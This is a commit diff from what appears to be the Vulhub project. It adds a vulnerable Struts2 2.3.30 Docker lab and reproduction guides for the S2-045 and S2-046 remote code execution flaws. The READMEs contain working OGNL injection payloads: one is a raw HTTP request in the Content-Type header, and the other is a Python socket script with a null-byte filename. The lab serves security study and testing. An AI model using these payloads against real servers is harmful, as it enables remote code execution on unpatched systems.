s2-045 / s2-046 (vulhub#145)

* add struts2 s2-045/046 * adjust * fix * add struts2 s2-045/046 manual
Hopfrosch · Oct 12, 2019 · 0b4305c · 0b4305c
1 parent 222c95a
commit 0b4305c
Show file tree

Hide file tree

Showing 14 changed files with 315 additions and 0 deletions.
diff --git a/base/struts2/2.3.30/Dockerfile b/base/struts2/2.3.30/Dockerfile
@@ -0,0 +1,12 @@
+FROM maven:3-jdk-8
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY ./ /usr/src/
+WORKDIR /usr/src
+
+RUN set -ex \
+    && mvn compile jetty:help
+
+EXPOSE 8080
+CMD ["mvn", "jetty:run"]
diff --git a/base/struts2/2.3.30/pom.xml b/base/struts2/2.3.30/pom.xml
@@ -0,0 +1,39 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+  <groupId>org.pwntester</groupId>
+  <artifactId>Struts2FileUpload</artifactId>
+  <packaging>war</packaging>
+  <version>1.0-SNAPSHOT</version>
+  <name>Struts2FileUpload Maven Webapp</name>
+  <url>http://maven.apache.org</url>
+  <dependencies>
+
+	<dependency>
+      <groupId>org.apache.struts</groupId>
+	  <artifactId>struts2-core</artifactId>
+	  <version>2.3.30</version>
+    </dependency>
+
+  </dependencies>
+
+  <build>
+    <finalName>Struts2FileUpload</finalName>
+    <plugins>
+      <plugin>
+        <groupId>org.eclipse.jetty</groupId>
+        <artifactId>jetty-maven-plugin</artifactId>
+        <version>9.2.11.v20150529</version>
+        <configuration>
+            <scanIntervalSeconds>10</scanIntervalSeconds>
+            <webApp>
+                <contextPath>/</contextPath>
+            </webApp>
+            <httpConnector>
+                <port>8080</port>
+            </httpConnector>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
+</project>
diff --git a/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java b/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java
@@ -0,0 +1,55 @@
+package org.pwntester.action;
+
+import com.opensymphony.xwork2.ActionSupport;
+import java.io.File;
+
+public class FileUploadAction extends ActionSupport {
+
+    private String contentType;
+    private File upload;
+    private String fileName;
+    private String caption;
+
+    public String input() throws Exception {
+        return SUCCESS;
+    }
+
+
+    public String upload() throws Exception {
+        return SUCCESS;
+    }
+
+    public String getUploadFileName() {
+        return fileName;
+    }
+
+    public void setUploadFileName(String fileName) {
+        this.fileName = fileName;
+    }
+
+    public String getUploadContentType() {
+        return contentType;
+    }
+
+    public void setUploadContentType(String contentType) {
+        this.contentType = contentType;
+    }
+
+    public File getUpload() {
+        return upload;
+    }
+
+    public void setUpload(File upload) {
+        this.upload = upload;
+    }
+
+    public String getCaption() {
+        return caption;
+    }
+
+    public void setCaption(String caption) {
+        this.caption = caption;
+    }
+}
+
+
diff --git a/base/struts2/2.3.30/src/main/resources/global.properties b/base/struts2/2.3.30/src/main/resources/global.properties
@@ -0,0 +1,3 @@
+struts.messages.error.file.too.large = Uploaded File size is too large
+struts.messages.error.content.type.not.allowed =File type is not allowed.
+struts.messages.error.file.extension.not.allowed =File extension is not allowed.
diff --git a/base/struts2/2.3.30/src/main/resources/struts.xml b/base/struts2/2.3.30/src/main/resources/struts.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<!DOCTYPE struts PUBLIC
+"-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"
+"http://struts.apache.org/dtds/struts-2.0.dtd">
+
+<struts>
+
+ 	<constant name="struts.devMode" value="false" />
+    <constant name="struts.custom.i18n.resources" value="global" />
+    <!-- <constant name="struts.multipart.parser" value="jakarta-stream" /> -->
+    <!--constant name="struts.multipart.maxSize" value="1" /-->
+
+	<package name="default" namespace="/" extends="struts-default">
+        <default-action-ref name="doUpload" />
+        <action name="upload" class="org.pwntester.action.FileUploadAction" method="input">
+            <result>pages/upload.jsp</result>
+        </action>
+
+        <action name="doUpload" class="org.pwntester.action.FileUploadAction" method="upload">
+            <result name="input">pages/upload.jsp</result>
+            <result>pages/upload-success.jsp</result>
+        </action>
+	</package>
+
+</struts>
diff --git a/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml b/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml
@@ -0,0 +1,17 @@
+<!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+
+<web-app>
+  <display-name>Struts 2 Web Application</display-name>
+
+  <filter>
+    <filter-name>struts2</filter-name>
+      <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
+  </filter>
+  <filter-mapping>
+	<filter-name>struts2</filter-name>
+	<url-pattern>/*</url-pattern>
+  </filter-mapping>
+
+</web-app>
diff --git a/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp b/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp
@@ -0,0 +1,27 @@
+<%@ taglib prefix="s" uri="/struts-tags" %>
+<html>
+<head>
+   <title>Struts2 Showcase - Fileupload sample</title>
+</head>
+
+<body>
+<div class="page-header">
+   <h1>Fileupload sample</h1>
+</div>
+
+<div class="container-fluid">
+   <div class="row-fluid">
+      <div class="span12">
+         <s:actionerror cssClass="alert alert-error"/>
+         <s:fielderror cssClass="alert alert-error"/>
+         <s:form action="doUpload" method="POST" enctype="multipart/form-data">
+            <s:file name="upload" label="File"/>
+            <s:textfield name="caption" label="Caption"/>
+            <s:submit cssClass="btn btn-primary"/>
+         </s:form>
+      </div>
+   </div>
+</div>
+</body>
+</html>
+
diff --git a/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp b/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp
@@ -0,0 +1,31 @@
+<%@ page
+        language="java"
+        contentType="text/html; charset=UTF-8"
+        pageEncoding="UTF-8"%>
+<%@ taglib prefix="s" uri="/struts-tags" %>
+<html>
+<head>
+    <title>Struts2 Showcase - Fileupload sample</title>
+</head>
+
+<body>
+<div class="page-header">
+    <h1>Fileupload sample</h1>
+</div>
+
+<div class="container-fluid">
+    <div class="row-fluid">
+        <div class="span12">
+            <ul>
+                <li>ContentType: <s:property value="uploadContentType" /></li>
+                <li>FileName: <s:property value="uploadFileName" /></li>
+                <li>File: <s:property value="upload" /></li>
+                <li>Caption:<s:property value="caption" /></li>
+            </ul>
+        </div>
+    </div>
+</div>
+
+</body>
+</html>
+
diff --git a/struts2/s2-045/1.png b/struts2/s2-045/1.png
diff --git a/struts2/s2-045/README.md b/struts2/s2-045/README.md
@@ -0,0 +1,39 @@
+# S2-045 远程代码执行漏洞（CVE-2017-5638）
+
+影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
+
+漏洞详情: 
+
+ - http://struts.apache.org/docs/s2-045.html
+ - https://blog.csdn.net/u011721501/article/details/60768657
+ - https://paper.seebug.org/247/
+
+## 漏洞环境
+
+执行如下命令启动struts2 2.3.30：
+
+```
+docker-compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到上传页面。
+
+## 漏洞复现
+
+直接发送如下数据包，可见`233*233`已成功执行：
+
+```
+POST / HTTP/1.1
+Host: localhost:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.8,es;q=0.6
+Connection: close
+Content-Length: 0
+Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
+
+
+```
+
+![](1.png)
diff --git a/struts2/s2-045/docker-compose.yml b/struts2/s2-045/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ struts2:
+   image: vulhub/struts2:2.3.30
+   ports:
+    - "8080:8080"
diff --git a/struts2/s2-046/1.png b/struts2/s2-046/1.png
diff --git a/struts2/s2-046/README.md b/struts2/s2-046/README.md
@@ -0,0 +1,55 @@
+# S2-046 远程代码执行漏洞（CVE-2017-5638）
+
+影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
+
+漏洞详情: 
+
+ - https://cwiki.apache.org/confluence/display/WW/S2-046
+ - https://xz.aliyun.com/t/221
+
+## 漏洞环境
+
+执行如下命令启动struts2 2.3.30：
+
+```
+docker-compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到上传页面。
+
+## 漏洞复现
+
+与s2-045类似，但是输入点在文件上传的filename值位置，并需要使用`\x00`截断。
+
+由于需要发送畸形数据包，我们简单使用原生socket编写payload：
+
+```python
+import socket
+
+q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2
+Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b"
+Content-Type: text/plain
+
+foo
+------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n')
+p = b'''POST / HTTP/1.1
+Host: localhost:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.8,es;q=0.6
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2
+Content-Length: %d
+
+'''.replace(b'\n', b'\r\n') % (len(q), )
+
+with socket.create_connection(('your-ip', '8080'), timeout=5) as conn:
+    conn.send(p + q)
+    print(conn.recv(10240).decode())
+
+```
+
+`233*233`已成功执行：
+
+![](1.png)
diff --git a/struts2/s2-046/docker-compose.yml b/struts2/s2-046/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ struts2:
+   image: vulhub/struts2:2.3.30
+   ports:
+    - "8080:8080"